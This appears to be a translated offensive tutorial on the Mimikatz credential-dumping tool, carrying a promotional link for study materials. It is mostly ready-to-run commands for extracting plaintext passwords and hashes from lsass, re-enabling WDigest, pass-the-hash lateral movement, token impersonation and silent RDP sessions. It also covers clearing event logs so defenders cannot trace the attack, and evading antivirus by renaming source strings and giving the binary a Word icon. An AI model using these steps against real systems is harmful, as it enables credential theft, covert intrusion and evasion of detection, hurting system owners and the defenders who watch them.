0x01 Tool Introduction
Tool principle
The main principle of Mimikatz is that after the user logs in in the Windows system, the system will store the identity credentials in the memory of the lsass.exe process, and Mimikatz reads it by injecting the lsass.exe process Process memory, from which the corresponding plaintext password is obtained.
FAQ
After Windows Vista system, LM HASH is no longer stored, and after Windows 8.1 system, plaintext passwords are no longer stored in memory, so Mimikatz cannot be used to directly read plaintext passwords in higher versions of Windows systems. The key for Mimikatz to obtain plaintext passwords is wdigest, which is a reversible algorithm. The relevant registry storage locations are as follows:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"UseLogonCredential" (DWORD)
Subsequent high-version Windows systems cannot read plaintext because the registry key is closed. If you want to retrieve plaintext, you only need to open the registry and enter the password to log in again.
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1
I have sorted out the corresponding learning materials for my friends. If you need them, I can also share some of them (the confidential parts cannot be shared). If you need them, you can
[One Help Safety Learning One] Click to get 256G network security self-study materials
0x02 basic usage
Common usage
The startup of Mimikatz requires administrator/SYSTEM privileges to run. By default, there are 32-bit and 64-bit versions. The default storage location in Kali Linux is /usr/share/mimikatz. Most people use Mimikatz generally Only two commands are used, and I don’t know much about other commands. Next, I will give you a comprehensive introduction to Mimikatz, an artifact.
privilege::debug sekurlsa::logonpasswords
You can also use one sentence output to save
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"> pssword.txt
Basic syntax
Use the command to view all function modules
::
Modify the running permission of the debugging process to SYSTEM
privilege::debug privilege:: #View the running modules of privilege
Enable logging to save read user credential information
standard::log
0x03 common modules
Crypto module
The encryption module is mainly used to export exportable certificates, using the CryptoAPI function to access certificates, which is equivalent to a simplified version of certutil. Sometimes a legal certificate is very useful. When using a legal certificate to generate a Trojan horse program, it may be recognized as a whitelist program by the antivirus software and will not be detected and killed. The relevant parameters are as follows:
/provider #Specify the provider
/providertype #Specify the type of provider
/cngprovider #CNG provider
/export #Export key PVK file
View the provider of the associated key
crypto::providers
View current system storage information
crypto::stores
Common system store usernames include:
-
CURRENT_USER
-
USER_GROUP_POLICY
-
LOCAL_MACHINE
-
LOCAL_MACHINE_GROUP
-
LOCAL_MACHINE_ENTERPRISE
-
CURRENT_SERVICE
-
USERS
-
SERVICES
Specify the system storage as local_machine for viewing
crypto::stores /systemstore:local_machine
View user’s current credentials
crypto::certificates
Export the ROOT root certificate
crypto::certificates /store:Root
The exported certificate must match the store parameter. The public key is DER, the private key is PFX, and the password is mimikatz
crypto::certificates /store:Root /export
Use CryptoAPI to patch, sometimes the certificate cannot be exported, it may be that the patch is not applied
crypto::capi
Patch with CNG for exporting unmarked exportable certificates
crypto::cng
List smart card readers, an error may appear
crypto::sc
View related keys
crypto::key
Generate a certificate using OpenSSL
openssl rsa -inform pvk -in key.pvk -outform pem -out key.pem
Sekurlsa module
The Sekurlsa module can extract passwords, keys, pins, tickets and other user credential information from the lsass.exe process, and is the most commonly used module. View all identity authentication information and successfully obtain the user’s plaintext password
sekurlsa::logonpasswords
Errors may occur when checking the user hash, mainly due to the low current permissions
lsadump::sam
The solution is very simple, just run with system privileges
process::runp
Run again in a new window to get the hash successfully
Resetting the user NTLM hash will write the hash directly into the SAM database, so performing this operation is equivalent to resetting the password, and you need to use the new password to log in again
lsadump::setntlm /user:admin /ntlm:b2781ba85ac750ec286744b009599637
Dump and export the lsass.exe process
sekurlsa::minidump lsass.tmp
Lateral movement via pass-the-hash
sekurlsa::pth /user:admin /domain:host1 /ntlm:b2781ba85ac750ec286744b009599637 sekurlsa::pth /user:admin /domain:host1 /aes256:b2781ba85ac750ec286744b009599637
Windows Credentials can be viewed in Credential Manager
Token module
The Token module is mainly used to view and impersonate existing tokens. View current token information
token::whoami
View token list and impersonate sysadmin
token::list token::elevate /NT AUTHORITY\SYSTEM
restore fake process
token::revert
Other modules
Under normal circumstances, repeated logins to the remote desktop will cause the logged-in user to log out directly or prompt another user to log in
Cooperate with the command to log in to the remote desktop silently. This function is very useful in HW. Even if the administrator is logged in, we can still log in other users quietly
ts::multirdp
Successful login to the original session will not be affected, use the command to view the session list
ts::sessions
Although currently undetectable by logged-in users, there will still be login logs in the Event Viewer
Use the command to clear the log with one click
event::clear
After the log is successfully cleared, the blue team engineer cannot restore the attack process through the system log
Install/uninstall Mimikatz service to help us listen for user input
service:: + service::-
Mimikatz service successfully installed and started automatically
For example, listening to pasted text
misc::clip
0x04 Anti-kill use
As the most commonly used hacking tool, Mimikatz has long been marked by major security software, such as 360 Antivirus, 360 Security Guard, Kaspersky, etc. Using the source code to avoid killing can help us bypass the anti-virus software’s detection and killing. This is a feature code-based way to avoid killing. You only need to locate the feature code in the source code and modify it to achieve the anti-kill effect. Generally, three Location, respectively code, string and input table.
Prepare the environment
The following three elements need to be prepared before avoiding killing:
-
Mimikatz source code
-
Visual Studio 2019 (C++)
-
vc dependency file
Download the latest version of Mimikatz from Github
Download address: https://github.com/gentilkiwi/mimikatz
Update 360 antivirus and virus database to the latest version
Configuration issues
Click the startup file in Mimikatz to start Visual Studio, enter the activation certificate in the help menu > about > view license status to activate successfully. In VS 2012, if there is an error message (error MSB8020), the solution is to enter the project > properties > general > platform work set, change the platform to VS 2012 (v110), and then compile successfully.
Choose to generate an error interface, click Tools > Get Tools and Features > C + + for Desktop Development > C + + Windows XP Support for VS 2017 v141, click Modify to solve the problem
After the download and installation is complete, modify the manual toolset to the 2017 version
Change Treat warnings as errors to No in C++ in configuration properties, otherwise it won’t compile whenever there is an error
Regeneration and error: MSB8036
Select the installed SDK version in the project property page
Successfully compiled 32-bit Mimikatz after clicking Regenerate
If you need to generate a 64-bit program, you can select the platform as x64 in the solution > configuration properties
Click Regenerate to successfully compile 64-bit Mimikatz
The process of avoiding killing
Step into the topic Select the editor of the project mimikatz “Find and Replace” Replace in the file
Replace all the strings of the keyword mimikatz with macsec, click Replace All
Since all the strings are replaced, the file names that introduce mimikatz are also replaced, so all file names need to be changed to macsec
Click Regenerate to output macsec.exe
Although it is currently possible to perform static killing, it is still impossible to bypass dynamic killing
Further delete the comment information of macsec.c and macsec.h
Regenerate the program again and use the 360 test to still fail to bypass the dynamic killing
Modify the version information in macsec.rc, change the company name with gentilkiwi to macsec
Modify the icon macsec.ico to the Office Word icon and click Generate again
Put it into the anti-kill environment and run it again to successfully bypass
Of course, the command can also be executed successfully
After completing the anti-killing process, you can upload it to the cloud platform for anti-killing tests, but generally do not do this, the cloud platform will mark the anti-killing program